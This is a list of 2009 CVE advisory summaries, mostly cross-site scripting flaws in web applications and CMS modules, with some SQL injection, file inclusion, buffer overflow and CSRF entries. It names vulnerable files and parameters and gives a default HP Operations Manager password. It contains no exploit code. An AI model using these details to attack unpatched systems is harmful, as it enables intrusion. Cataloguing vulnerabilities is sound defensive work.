[CVE-2009-4223] PHP remote file inclusion vulnerability in adm/krgourl.php in KR-Web 1.1b2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.
[CVE-2009-4214] Cross-site scripting (XSS) vulnerability in the strip_tags function in Ruby on Rails before 2.2.s, and 2.3.x before 2.3.5, allows remote attackers to inject arbitrary web script or HTML via vectors involving non-printing ASCII characters, related to HTML::Tokenizer and actionpack/lib/action_controller/vendor/html-scanner/html/node.rb.
[CVE-2009-4209] Multiple cross-site scripting (XSS) vulnerabilities in admin/index.php in moziloCMS 1.11.1 allow remote attackers to inject arbitrary web script or HTML via the (1) cat and (2) file parameters in an editsite action, different vectors than CVE-2008-6127 and CVE-2009-1367.
[CVE-2009-4207] Cross-site scripting (XSS) vulnerability in the Webform module 5.x before 5.x-2.7 and 6.x before 6.x-2.7, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via a submission.
[CVE-2009-4197] rpwizPppoe.htm in Huawei MT882 V100R002B020 ARG-T running firmware 3.7.9.98 contains a form that does not disable the autocomplete setting for the password parameter, which makes it easier for local users or physically proximate attackers to obtain the password from web browsers that support autocomplete.
[CVE-2009-4196] Multiple cross-site scripting (XSS) vulnerabilities in multiple scripts in Forms/ in Huawei MT882 V100R002B020 ARG-T running firmware 3.7.9.98 allow remote attackers to inject arbitrary web script or HTML via the (1) BackButton parameter to error_1
[CVE-2009-4189] HP Operations Manager has a default password of OvW*busr1 for the ovwebusr account, which allows remote attackers to execute arbitrary code via a session that uses the manager role to conduct unrestricted file upload attacks against the /manager servlet in the Tomcat servlet container. NOTE: this might overlap CVE-2009-3099 and CVE-2009-3843.
[CVE-2009-4187] Multiple cross-site scripting (XSS) vulnerabilities in the Gateway component in Sun Java System Portal Server 6.3.1, 7.1, and 7.2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4185] Cross-site scripting (XSS) vulnerability in proxy/smhui/getuiinfo in HP System Management Homepage (SMH) before 6.0 allows remote attackers to inject arbitrary web script or HTML via the servercert parameter.
[CVE-2009-4182] Multiple unspecified vulnerabilities in HP Web Jetadmin 10.2, when a remote SQL server is used, allow remote attackers to obtain access to data or cause a denial of service, possibly by leveraging authentication and encryption weaknesses on the SQL server.
[CVE-2009-4181] Stack-based buffer overflow in ovwebsnmpsrv.exe in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via vectors involving the sel and arg parameters to jovgraph.exe.
[CVE-2009-4178] Heap-based buffer overflow in OvWebHelp.exe in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via a long Topic parameter.
[CVE-2009-4177] Buffer overflow in webappmon.exe in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via a long HTTP Host header.
[CVE-2009-4172] Cross-site scripting (XSS) vulnerability in index.php in CutePHP CuteNews 1.4.6 and UTF-8 CuteNews 8 and 8b, when magic_quotes_gpc is disabled, allows remote attackers to inject arbitrary web script or HTML via the body of a news article in an addnews action.
[CVE-2009-4169] Cross-site scripting (XSS) vulnerability in wp-cumulus.php in the WP-Cumulus Plug-in before 1.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4168] Cross-site scripting (XSS) vulnerability in Roy Tanck tagcloud.swf, as used in the WP-Cumulus plugin before 1.23 for WordPress and the Joomulus module 2.0 and earlier for Joomla!, allows remote attackers to inject arbitrary web script or HTML via the tagcloud parameter in a tags action. Cross-site scripting (XSS) vulnerability in tagcloud.swf in the WP-Cumulus Plug-in before 1.23 for WordPress allows remote attackers to inject arbitrary web script or HTML via the tagcloud parameter.
[CVE-2009-4164] Cross-site scripting (XSS) vulnerability in the simple Glossar (simple_glossar) extension 1.0.3 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4161] Cross-site scripting (XSS) vulnerability in the [AN] Search it! (an_searchit) extension 2.4.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4159] Cross-site scripting (XSS) vulnerability in the newsletter configuration feature in the backend module in the Direct Mail (direct_mail) extension 2.6.4 and earlier for TYPO3 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4157] Multiple cross-site scripting (XSS) vulnerabilities in index.php in the ProofReader (com_proofreader) component 1.0 RC9 and earlier for Joomla! allow remote attackers to inject arbitrary web script or HTML via the URI, which is not properly handled in (1) 404 or (2) error pages.
[CVE-2009-4153] Unspecified vulnerability in the XMLAccess component in IBM WebSphere Portal 6.1.x before 6.1.0.3 has unknown impact and attack vectors, related to the work directory.
[CVE-2009-4152] Cross-site scripting (XSS) vulnerability in the Collaboration component in IBM WebSphere Portal 6.1.x before 6.1.0.3 allows remote attackers to inject arbitrary web script or HTML via the people picker tag.
[CVE-2009-4151] Session fixation vulnerability in html/Elements/SetupSessionCookie in Best Practical Solutions RT 3.0.0 through 3.6.9 and 3.8.x through 3.8.5 allows remote attackers to hijack web sessions by setting the session identifier via a manipulation that leverages "HTTP access to the RT server," a related issue to CVE-2009-3585.
[CVE-2009-4129] Race condition in Mozilla Firefox allows remote attackers to produce a JavaScript message with a spoofed domain association by writing the message in between the document request and document load for a web page in a different domain.
[CVE-2009-4121] Multiple cross-site request forgery (CSRF) vulnerabilities in Quick.CMS 2.4 and Quick.CMS.Lite 2.4 allow remote attackers to hijack the authentication of the administrator for requests that (1) delete web pages via a p-delete action to admin.php, and possibly (2) delete products or (3) delete orders via unspecified vectors. NOTE: some of these details are obtained from third party information.
[CVE-2009-4119] Cross-site scripting (XSS) vulnerability in Feed Element Mapper module 5.x before 5.x-1.3, 6.x before 6.x-1.3, and 6.x-2.0-alpha before 6.x-2.0-alpha4 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4110] Cross-site scripting (XSS) vulnerability in the search functionality in DotNetNuke 4.8 through 5.1.4 allows remote attackers to inject arbitrary web script or HTML via search terms that are not properly filtered before display in a custom results page.
[CVE-2009-4096] RADIO istek scripti 2.5 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain user credentials via a direct request for estafresgaftesantusyan.inc.
[CVE-2009-4093] Multiple cross-site scripting (XSS) vulnerabilities in comments.php in Simplog 0.9.3.2, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) cname (Name) or (2) email parameters.
[CVE-2009-4087] Cross-site scripting (XSS) vulnerability in index.php in telepark.wiki 2.4.23 and earlier allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2009-4083] Multiple cross-site scripting (XSS) vulnerabilities in e107 0.7.16 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors in (1) submitnews.php, (2) usersettings.php
[CVE-2009-4078] Multiple cross-site scripting (XSS) vulnerabilities in Redmine 0.8.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4077] Cross-site request forgery (CSRF) vulnerability in Roundcube Webmail 0.2.2 and earlier allows remote attackers to hijack the authentication of unspecified users for requests that send arbitrary emails via unspecified vectors, a different vulnerability than CVE-2009-4076.
[CVE-2009-4076] Cross-site request forgery (CSRF) vulnerability in Roundcube Webmail 0.2.2 and earlier allows remote attackers to hijack the authentication of unspecified users for requests that modify user information via unspecified vectors, a different vulnerability than CVE-2009-4077.
[CVE-2009-4074] The XSS Filter in Microsoft Internet Explorer 8 allows remote attackers to leverage the "response-changing mechanism" to conduct cross-site scripting (XSS) attacks against web sites that have no inherent XSS vulnerabilities, related to the details of output encoding and improper modification of an HTML attribute, aka "XSS Filter Script Handling Vulnerability."
[CVE-2009-4073] The printing functionality in Microsoft Internet Explorer 8 allows remote attackers to discover a local pathname, and possibly a local username, by reading the dc:title element of a PDF document that was generated from a local web page.
[CVE-2009-4071] Opera before 10.10, when exception stacktraces are enabled, places scripting error messages from a web site into variables that can be read by a different web site, which allows remote attackers to obtain sensitive information or conduct cross-site scripting (XSS) attacks via unspecified vectors.
[CVE-2009-4069] Multiple cross-site scripting (XSS) vulnerabilities in GForge 4.5.14, 4.7.3, and possibly other versions allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4065] Cross-site scripting (XSS) vulnerability in the settings page in the Strongarm module 6.x before 6.x-1.1 for Drupal allows remote attackers to inject arbitrary web script or HTML via the value field when viewing overridden variables.
[CVE-2009-4064] Cross-site scripting (XSS) vulnerability in the Gallery Assist module 6.x before 6.x-1.7 for Drupal allows remote attackers to inject arbitrary web script or HTML via node titles.
[CVE-2009-4063] Cross-site scripting (XSS) vulnerability in the Subgroups for Organic Groups (OG) module 5.x before 5.x-4.0 and 5.x before 5.x-3.4 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified node titles.
[CVE-2009-4062] Multiple cross-site scripting (XSS) vulnerabilities in the Printfriendly module 6.x before 6.x-1.6 for Drupal allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4061] Multiple cross-site scripting (XSS) vulnerabilities in the Agreement module 6.x before 6.x-1.2 for Drupal allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4052] Multiple cross-site scripting (XSS) vulnerabilities in the JSF Widget Library Runtime in IBM Rational Application Developer for WebSphere Software before 7.0.0.10 and Rational Software Architect before 7.0.0.10 allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) the JSF Tree Control and (2) the JavaScript Resource Servlet.
[CVE-2009-4047] Multiple cross-site scripting (XSS) vulnerabilities in PHD Help Desk 1.43 allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO to area.php
[CVE-2009-4044] The Web Services module 6.x for Drupal does not perform the expected access control, which allows remote attackers to make unspecified use of an API via unknown vectors.
[CVE-2009-4043] Cross-site scripting (XSS) vulnerability in the AddToAny module 5.x before 5.x-2.4 and 6.x before 6.x-2.4 for Drupal allows remote attackers to inject arbitrary web script or HTML via a node title.
[CVE-2009-4042] Cross-site scripting (XSS) vulnerability in the RootCandy theme 6.x before 6.x-1.5 for Drupal allows remote attackers to inject arbitrary web script or HTML via the URI.
[CVE-2009-4040] Cross-site scripting (XSS) vulnerability in phpMyFAQ before 2.0.17 and 2.5.x before 2.5.2, when used with Internet Explorer 6 or 7, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters to the search page.
[CVE-2009-4039] Cross-site scripting (XSS) vulnerability in Piwigo before 2.0.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4038] Multiple cross-site scripting (XSS) vulnerabilities in NCH Software Axon Virtual PBX 2.10 and 2.11 allow remote attackers to inject arbitrary web script or HTML via the (1) onok or (2) oncancel parameter to the logon program. NOTE: the provenance of this information is unknown.
[CVE-2009-4032] Multiple cross-site scripting (XSS) vulnerabilities in Cacti 0.8.7e allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) graph.php, (2) include/top_graph_header.php, (3) lib/html_form.php, and (4) lib/timespan_settings.php, as demonstrated by the (a) graph_end or (b) graph_start parameters to graph.php.
[CVE-2009-3985] Mozilla Firefox before 3.0.16 and 3.5.x before 3.5.6, and SeaMonkey before 2.0.1, allows remote attackers to associate spoofed content with an invalid URL by setting document.location to this URL, and then writing arbitrary web script or HTML to the associated blank document, a related issue to CVE-2009-2654.
[CVE-2009-3970] SQL injection vulnerability in index.php in PHP Dir Submit (aka WebsiteSubmitter or Submitter Script) allows remote authenticated users to execute arbitrary SQL commands via the aid parameter in a showarticle action.
[CVE-2009-3962] The management interface on the 2wire Gateway 1700HG, 1701HG, 1800HW, 2071, 2700HG, and 2701HG-T with software before 5.29.52 allows remote attackers to cause a denial of service (reboot) via a %0d%0a sequence in the page parameter to the xslt program on TCP port 50001, a related issue to CVE-2006-4523.
[CVE-2009-3950] Multiple cross-site scripting (XSS) vulnerabilities in Bractus SunTrack allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to newprofile.html
[CVE-2009-3934] The WebFrameLoaderClient::dispatchDidChangeLocationWithinPage function in src/webkit/glue/webframeloaderclient_impl.cc in Google Chrome before 3.0.195.32 allows user-assisted remote attackers to cause a denial of service via a page-local link, related to an "empty redirect chain," as demonstrated by a message in Yahoo! Mail.
[CVE-2009-3933] WebKit before r50173, as used in Google Chrome before 3.0.195.32, allows remote attackers to cause a denial of service (CPU consumption) via a web page that calls the JavaScript setInterval method, which triggers an incompatibility between the WTF::currentTime and base::Time functions.
[CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
[CVE-2009-3919] Cross-site scripting (XSS) vulnerability in the NGP COO/CWP Integration (crmngp) module 6.x before 6.x-1.12 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified "user-supplied information."
[CVE-2009-3918] Cross-site scripting (XSS) vulnerability in the Zoomify module 5.x before 5.x-2.2 and 6.x before 6.x-1.4, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via the node title.
[CVE-2009-3917] Cross-site scripting (XSS) vulnerability in the S5 Presentation Player module 6.x-1.x before 6.x-1.1 for Drupal allows remote attackers to inject arbitrary web script or HTML via an unspecified field that is copied to the HTML HEAD element.
[CVE-2009-3916] Cross-site scripting (XSS) vulnerability in the Node Hierarchy module 5.x before 5.x-1.3 and 6.x before 6.x-1.3, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via a child node title.
[CVE-2009-3915] Cross-site scripting (XSS) vulnerability in the "Separate title and URL" formatter in the Link module 5.x before 5.x-2.6 and 6.x before 6.x-2.7, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via the link title field.
[CVE-2009-3914] Cross-site scripting (XSS) vulnerability in the Temporary Invitation module 5.x before 5.x-2.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via the Name field in an invitation.
[CVE-2009-3913] SQL injection vulnerability in summary.php in Xerox Fiery Webtools allows remote attackers to execute arbitrary SQL commands via the select parameter.
[CVE-2009-3911] Cross-site scripting (XSS) vulnerability in settings.php in TFTgallery 0.13 allows remote attackers to inject arbitrary web script or HTML via the sample parameter.
[CVE-2009-3905] Multiple cross-site scripting (XSS) vulnerabilities in e-Courier CMS allow remote attackers to inject arbitrary web script or HTML via the UserGUID parameter to (1) Wizard_tracking.asp, (2) wizard_oe2.asp, (3) your-register.asp, (4) main-whyregister.asp, and (5) your.asp in home/, and other unspecified vectors. NOTE: the provenance of this information is unknown.
[CVE-2009-3903] Multiple cross-site scripting (XSS) vulnerabilities in jspui/index.jsp in ManageEngine Netflow Analyzer 7.5 build 7500 allow remote attackers to inject arbitrary web script or HTML via the (1) view and (2) section parameters. NOTE: the provenance of this information is unknown.
[CVE-2009-3902] Directory traversal vulnerability in Cherokee Web Server 0.5.4 and earlier for Windows allows remote attackers to read arbitrary files via a /\.. (slash backslash dot dot) in the URL.
[CVE-2009-3901] Multiple cross-site scripting (XSS) vulnerabilities in e-Courier CMS allow remote attackers to inject arbitrary web script or HTML via the UserGUID parameter to home/index.asp and other unspecified vectors.
[CVE-2009-3898] Directory traversal vulnerability in src/http/modules/ngx_http_dav_module.c in nginx (aka Engine X) before 0.7.63, and 0.8.x before 0.8.17, allows remote authenticated users to create or overwrite arbitrary files via a .. (dot dot) in the Destination HTTP header for the WebDAV (1) COPY or (2) MOVE method.
[CVE-2009-3892] Cross-site scripting (XSS) vulnerability in Best Practical Solutions RT 3.6.x before 3.6.9, 3.8.x before 3.8.5, and other 3.4.6 through 3.8.4 versions allows remote attackers to inject arbitrary web script or HTML via certain Custom Fields.
[CVE-2009-3891] Cross-site scripting (XSS) vulnerability in wp-admin/press-this.php in WordPress before 2.8.6 allows remote authenticated users to inject arbitrary web script or HTML via the s parameter (aka the selection variable).
[CVE-2009-3886] The Java Web Start implementation in Sun Java SE 6 before Update 17 does not properly handle the interaction between a signed JAR file and a JNLP (1) application or (2) applet, which has unspecified impact and attack vectors, related to a "regression," aka Bug Id 6870531.
[CVE-2009-3878] Buffer overflow in Sun Java System Web Server 7.0 Update 6 has unspecified impact and remote attack vectors, as demonstrated by the vd_sjws module in VulnDisco Pack Professional 8.12. NOTE: as of 20091105, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
[CVE-2009-3866] The Java Web Start Installer in Sun Java SE in JDK and JRE 6 before Update 17 does not properly use security model permissions when removing installer extensions, which allows remote attackers to execute arbitrary code by modifying a certain JNLP file to have a URL field that points to an unintended trusted application, aka Bug Id 6872824.
[CVE-2009-3865] The launch method in the Deployment Toolkit plugin in Java Runtime Environment (JRE) in Sun Java SE in JDK and JRE 6 before Update 17 allows remote attackers to execute arbitrary commands via a crafted web page, aka Bug Id 6869752.
[CVE-2009-3858] Cross-site scripting (XSS) vulnerability in GejoSoft allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the default URI in photos/tags.
[CVE-2009-3856] Cross-site scripting (XSS) vulnerability in the default URI in news/ in Twilight CMS before 4.1 allows remote attackers to inject arbitrary web script or HTML via the calendar parameter. NOTE: some of these details are obtained from third party information.
[CVE-2009-3833] Cross-site scripting (XSS) vulnerability in index.php in TFTgallery 0.13 allows remote attackers to inject arbitrary web script or HTML via the album parameter.
[CVE-2009-3822] PHP remote file inclusion vulnerability in Fiji Web Design Ajax Chat (com_ajaxchat) component 1.0 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[mosConfig_absolute_path] parameter to tests/ajcuser.php.
[CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-3816] Multiple cross-site scripting (XSS) vulnerabilities in Activities pages in the Mobile subsystem in IBM Lotus Connections 2.5.0.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-3803] Multiple cross-site scripting (XSS) vulnerabilities in Amiro.CMS 5.4.0.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the status_message parameter to (1) /news, (2) /comment, (3) /forum, (4) /blog, and (5) /tags.
[CVE-2009-3789] Multiple cross-site scripting (XSS) vulnerabilities in OpenDocMan 1.2.5 allow remote attackers to inject arbitrary web script or HTML via the last_message parameter to (1) add.php, (2) toBePublished.php, (3) index.php, and (4) admin.php.
[CVE-2009-3786] Cross-site scripting (XSS) vulnerability in Organic Groups (OG) Vocabulary 5.x before 5.x-1.1 and 6.x before 6.x-1.1, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via the group title.
[CVE-2009-3784] Open redirect vulnerability in Simplenews Statistics 6.x before 6.x-2.0, a module for Drupal, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2009-3783] Cross-site scripting (XSS) vulnerability in Simplenews Statistics 6.x before 6.x-2.0, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vector.
[CVE-2009-3780] Cross-site scripting (XSS) vulnerability in Abuse 5.x before 5.x-2.1 and 6.x before 6.x-1.1-alpha1, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-3779] Cross-site scripting (XSS) vulnerability in vCard 5.x before 5.x-1.4 and 6.x before 6.x-1.3, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to the addition of the theme_vcard function to a theme and the use of default content.
[CVE-2009-3760] Static code injection vulnerability in config/writeconfig.php in the sample code in the XenServer Resource Kit in Citrix XenCenterWeb allows remote attackers to inject arbitrary PHP code into include/config.ini.php via the pool1 parameter. NOTE: some of these details are obtained from third party information.
[CVE-2009-3759] Multiple cross-site request forgery (CSRF) vulnerabilities in sample code in the XenServer Resource Kit in Citrix XenCenterWeb allow remote attackers to hijack the authentication of administrators for (1) requests that change the password via the username parameter to config/changepw.php or (2) stop a virtual machine via the stop_vmname parameter to hardstopvm.php. NOTE: some of these details are obtained from third party information.
[CVE-2009-3758] SQL injection vulnerability in login.php in sample code in the XenServer Resource Kit in Citrix XenCenterWeb allows remote attackers to execute arbitrary SQL commands via the username parameter. NOTE: some of these details are obtained from third party information.
[CVE-2009-3757] Multiple cross-site scripting (XSS) vulnerabilities in sample code in the XenServer Resource Kit in Citrix XenCenterWeb allow remote attackers to inject arbitrary web script or HTML via the (1) username parameter to config/edituser.php
[CVE-2009-3755] Multiple cross-site scripting (XSS) vulnerabilities in phpBMS 0.96 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) index.php and (2) modules\base\myaccount.php.
[CVE-2009-3751] Cross-site scripting (XSS) vulnerability in home.php in Opial 1.0 allows remote attackers to inject arbitrary web script or HTML via the genres_parent parameter.
[CVE-2009-3749] The Web Administrator service (STEMWADM.EXE) in Websense Personal Email Manager 7.1 before Hotfix 4 and Email Security 7.1 before Hotfix 4 allows remote attackers to cause a denial of service (crash) by sending a HTTP GET request to TCP port 8181 and closing the socket before the service can send a response.
[CVE-2009-3748] Multiple cross-site scripting (XSS) vulnerabilities in the Web Administrator in Websense Personal Email Manager 7.1 before Hotfix 4 and Email Security 7.1 before Hotfix 4 allow remote attackers to inject arbitrary web script or HTML via the (1) FileName, (2) IsolatedMessageID, (3) ServerName, (4) Dictionary, (5) Scoring, and (6) MessagePart parameters to web/msgList/viewmsg/actions/msgAnalyse.asp.
[CVE-2009-3747] Cross-site scripting (XSS) vulnerability in index.php in TBmnetCMS 1.0 allows remote attackers to inject arbitrary web script or HTML via the content parameter. NOTE: this was originally reported for tbmnet.php, but that program does not exist in the TBmnetCMS 1.0 distribution.
[CVE-2009-3745] Cross-site scripting (XSS) vulnerability in the help pages in IBM Rational AppScan Enterprise Edition 5.5.0.2 allows remote attackers to inject arbitrary web script or HTML via the query string.
[CVE-2009-3742] Cross-site scripting (XSS) vulnerability in Liferay Portal before 5.3.0 allows remote attackers to inject arbitrary web script or HTML via the p_p_id parameter.
[CVE-2009-3731] Multiple cross-site scripting (XSS) vulnerabilities in WebWorks Help 2.0 through 5.0 in VMware vCenter 4.0 before Update 1 Build 208156
[CVE-2009-3730] Multiple cross-site scripting (XSS) vulnerabilities in the ReqWeb Help feature (aka the Web Client Help system) in IBM Rational RequisitePro 7.1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the operation parameter to ReqWebHelp/advanced/workingSet.jsp, or the (2) searchWord, (3) maxHits, (4) scopedSearch, or (5) scope parameter to ReqWebHelp/basic/searchView.jsp.
[CVE-2009-3719] Cross-site scripting (XSS) vulnerability in comment.asp in Battle Blog 1.25 and 1.30 build 2 allows remote attackers to inject arbitrary web script or HTML via a comment.
[CVE-2009-3714] Cross-site scripting (XSS) vulnerability in admin_login.php in MCshoutbox 1.1 allows remote attackers to inject arbitrary web script or HTML via the loginerror parameter.
[CVE-2009-3697] SQL injection vulnerability in the PDF schema generator functionality in phpMyAdmin 2.11.x before 2.11.9.6 and 3.x before 3.2.2.1 allows remote attackers to execute arbitrary SQL commands via unspecified interface parameters.
[CVE-2009-3696] Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.11.x before 2.11.9.6 and 3.x before 3.2.2.1 allows remote attackers to inject arbitrary web script or HTML via a crafted name for a MySQL table.
[CVE-2009-3668] Cross-site scripting (XSS) vulnerability in ardguest.php in Ardguest 1.8 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2009-3666] Cross-site scripting (XSS) vulnerability in index.php in Nullam Blog 0.1.2 allows remote attackers to inject arbitrary web script or HTML via the e parameter in an error action.
[CVE-2009-3663] Format string vulnerability in the h_readrequest function in http.c in httpdx Web Server 1.4 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via format string specifiers in the Host header.
[CVE-2009-3657] Session fixation vulnerability in Shared Sign-On 5.x and 6.x, a module for Drupal, allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2009-3654] Unspecified vulnerability in Boost before 6.x-1.03, a module for Drupal, allows remote attackers to create new webroot directories via unknown attack vectors.
[CVE-2009-3652] Cross-site scripting (XSS) vulnerability in Organic Groups (OG) 5.x-7.x before 5.x-7.4, 5.x-8.x before 5.x-8.1, and 6.x-1.x before 6.x-1.4, a module for Drupal, allows remote authenticated users, with create or edit group nodes permissions, to inject arbitrary web script or HTML via the User-Agent HTTP header, a different issue than CVE-2008-3095.
[CVE-2009-3651] Cross-site scripting (XSS) vulnerability in the "Monitor browsers" feature in Browscap before 5.x-1.1 and 6.x-1.1, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header.
[CVE-2009-3650] Cross-site scripting (XSS) vulnerability in Dex 5.x-1.0 and earlier and 6.x-1.0-rc1 and earlier, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-3649] Cross-site scripting (XSS) vulnerability in forums/index.php in Power Bulletin Board (PBBoard) 2.0.2 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the id parameter in a new_topic action.
[CVE-2009-3648] Cross-site scripting (XSS) vulnerability in Service Links 6.x-1.0, a module for Drupal, allows remote authenticated users, with 'administer content types' permissions, to inject arbitrary web script or HTML via unspecified vectors when displaying content type names.
[CVE-2009-3647] Cross-site scripting (XSS) vulnerability in emaullinks.php in YABSoft Mega File Hosting Script (aka MFH or MFHS) 1.2 allows remote attackers to inject arbitrary web script or HTML via the moudi parameter. NOTE: the provenance of this information is unknown.
[CVE-2009-3646] InterVations NaviCOPA Web Server 3.01 allows remote attackers to obtain the source code for a web page via an HTTP request with the addition of ::$DATA after the HTML file name.
[CVE-2009-3636] Cross-site scripting (XSS) vulnerability in the Install Tool subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2009-3634] Cross-site scripting (XSS) vulnerability in the Frontend Login Box (aka felogin) subcomponent in TYPO3 4.2.0 through 4.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2009-3633] Cross-site scripting (XSS) vulnerability in the t3lib_div::quoteJSvalue API function in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the sanitizing algorithm.
[CVE-2009-3630] The Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote authenticated users to place arbitrary web sites in TYPO3 backend framesets via crafted parameters, related to a "frame hijacking" issue.
[CVE-2009-3629] Multiple cross-site scripting (XSS) vulnerabilities in the Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-3618] Cross-site scripting (XSS) vulnerability in viewvc.py in ViewVC 1.0 before 1.0.9 and 1.1 before 1.1.2 allows remote attackers to inject arbitrary web script or HTML via the view parameter. NOTE: some of these details are obtained from third party information.
[CVE-2009-3601] Cross-site scripting (XSS) vulnerability in demo_page.php in Scriptsez Ultimate Poll allows remote attackers to inject arbitrary web script or HTML via the clr parameter in a vote action.
[CVE-2009-3599] Cross-site scripting (XSS) vulnerability in single_winner1.php in HUBScript 1.0 allows remote attackers to inject arbitrary web script or HTML via the bid_id parameter.
[CVE-2009-3598] Cross-site scripting (XSS) vulnerability in survey_result.php in eCardMAX FormXP 2007 allows remote attackers to inject arbitrary web script or HTML via the sid parameter.
[CVE-2009-3597] Digitaldesign CMS 0.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for autoconfig.dd.
[CVE-2009-3594] Cross-site scripting (XSS) vulnerability in bpost.php in BLOB Blog System before 1.2 allows remote attackers to inject arbitrary web script or HTML via the postid parameter.
[CVE-2009-3593] Multiple cross-site scripting (XSS) vulnerabilities in Freelancers 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to placebid.php and (2) jobid parameter to post_resume.php.
[CVE-2009-3592] Cross-site scripting (XSS) vulnerability in customer/home.php in Qualiteam X-Cart allows remote attackers to inject arbitrary web script or HTML via the email parameter in a subscribed action, a different vector than CVE-2005-1823.
[CVE-2009-3585] Session fixation vulnerability in html/Elements/SetupSessionCookie in Best Practical Solutions RT 3.0.0 through 3.6.9 and 3.8.x through 3.8.5 allows remote attackers to hijack web sessions by setting the session identifier via a manipulation that leverages a second web server within the same domain.
[CVE-2009-3581] Multiple cross-site scripting (XSS) vulnerabilities in SQL-Ledger 2.8.24 allow remote authenticated users to inject arbitrary web script or HTML via (1) the DCN Description field in the Accounts Receivables menu item for Add Transaction, (2) the Description field in the Accounts Payable menu item for Add Transaction, or the name field in (3) the Customers menu item for Add Customer or (4) the Vendor menu item for Add Vendor.
[CVE-2009-3579] Cross-site scripting (XSS) vulnerability in the CookieDump.java sample application in Mort Bay Jetty 6.1.19 and 6.1.20 allows remote attackers to inject arbitrary web script or HTML via the Value parameter in a GET request to cookie/.
[CVE-2009-3567] Cross-site scripting (XSS) vulnerability in modules/tickets/functions_ticketsui.php in Kayako SupportSuite and eSupport 3.60.04 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in the staff control panel, a different vector than CVE-2007-1145.
[CVE-2009-3565] Multiple cross-site scripting (XSS) vulnerabilities in intruvert/jsp/module/Login.jsp in McAfee IntruShield Network Security Manager (NSM) before 5.1.11.6 allow remote attackers to inject arbitrary web script or HTML via the (1) iaction or (2) node parameter.
